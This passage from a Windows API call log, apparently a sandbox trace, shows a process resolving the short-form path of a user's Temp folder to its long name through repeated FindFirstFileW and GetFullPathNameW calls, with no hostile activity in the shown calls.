lpsz="c:\\") returned 0x3 [0121.140] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.140] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0121.140] SetLastError (dwErrCode=0x0) [0121.140] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0121.140] GetLastError () returned 0x0 [0121.140] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x114c78c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x114c78c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="댴Ĕ잌ĔJ")) returned 0xffffffff [0121.141] GetLastError () returned 0x2 [0121.141] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.141] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0121.141] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0121.142] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0121.142] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0121.142] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.142] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.142] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0121.142] SetLastError (dwErrCode=0x0) [0121.142] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0121.142] GetLastError () returned 0x0 [0121.142] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x28f914, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x50, nFileSizeLow=0x114c830, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="댴Ĕﳔ(P", cAlternateFileName="쥄Ĕ죬ĔH")) returned 0xffffffff [0121.142] GetLastError () returned 0x2 [0121.143] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.143] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0121.143] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0121.143] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0121.143] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0121.143] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.144] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.144] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0121.144] SetLastError (dwErrCode=0x0) [0121.144] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0121.144] GetLastError () returned 0x0 [0121.144] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f65c, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x50, nFileSizeLow=0x114c830, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="쥄Ĕ塚(P", cAlternateFileName="쩌Ĕ짴Ĕ>")) returned 0xffffffff [0121.144] GetLastError () returned 0x2 [0121.144] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.145] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0121.145] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0121.145] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0121.145] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0121.145] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.145] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0121.146] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0121.146] SetLastError (dwErrCode=0x0) [0121.146] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0121.146] GetLastError () returned 0x0 [0121.146] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x40, nFileSizeLow=0x11469a0, dwReserved0=0x28f26c, dwReserved1=0x3e, cFileName="쩌Ĕ(P", cAlternateFileName="槴Ĕ梌Ĕ2")) returned 0xffffffff [0121.146] GetLastError () returned 0x2 [0121.146] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0121.146] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0121.146] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0121.147] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0121.147] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0121.147] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.147] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0121.147] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0121.147] SetLastError (dwErrCode=0x0) [0121.148] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0121.148] GetLastError () returned 0x0 [0121.148] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1ce8fe4, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x1130000, nFileSizeHigh=0x40, nFileSizeLow=0x1146910, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="槴Ĕ(@", cAlternateFileName="뚜Ĕ뗴Ĕ\"")) returned 0xffffffff [0121.148] GetLastError () returned 0x2 [0121.148] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0121.148] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0121.148] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0121.149] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0121.149] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0121.149] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.149] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0121.149] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.149] SetLastError (dwErrCode=0x0) [0121.149] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0121.149] GetLastError () returned 0x0 [0121.151] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x114c030 [0121.151] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0121.151] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0121.151] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.152] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0121.152] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0121.152] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0121.152] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x114c030 [0121.152] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0121.152] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0121.152] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.153] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0121.153] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0121.153] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0121.153] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x114c030 [0121.154] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0121.154] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0121.154] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.154] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.154] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0121.155] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0121.155] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x114c030 [0121.155] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0121.155] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0121.155] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.156] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.156] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0121.156] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0121.156] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0x114c030 [0121.157] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0121.157] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0121.157] FindClose (in: hFindFile=0x114c030 | out: hFindFile=0x114c030) returned 1 [0121.157] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0121.157] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0121.158] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0121.158] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x114c78c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x114c78c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="댴Ĕ잌ĔJ")) returned 0xffffffff [0121.158] GetLastError () returned 0x2 [0121.158] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0121.159] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f7d8*="Temp") returned 0x24 [0121.159] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0121.159] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0121.159] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.160] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.160] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0121.160] SetLastError (dwErrCode=0x0) [0121.160] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0121.160] GetLastError () returned 0x0 [0121.160] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0121.160] GetLastError () returned 0x2 [0121.160] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0121.160] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0121.160] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f520*="Local") returned 0x1f [0121.161] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0121.161] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0121.161] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0121.161] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.161] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0121.161] SetLastError (dwErrCode=0x0) [0121.161] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0121.162] GetLastError () returned 0x0 [0121.162] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x28f7a0, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x114b38c, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0x114b38c, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="둜Ĕﳈ(P", cAlternateFileName="돴Ĕ짴Ĕ>")) returned 0xffffffff [0121.162] GetLastError () returned 0x2 [0121.162] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0121.162] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0121.162] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28f268*="AppData") returned 0x19 [0121.163] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0121.163] SysReAllocStringLen 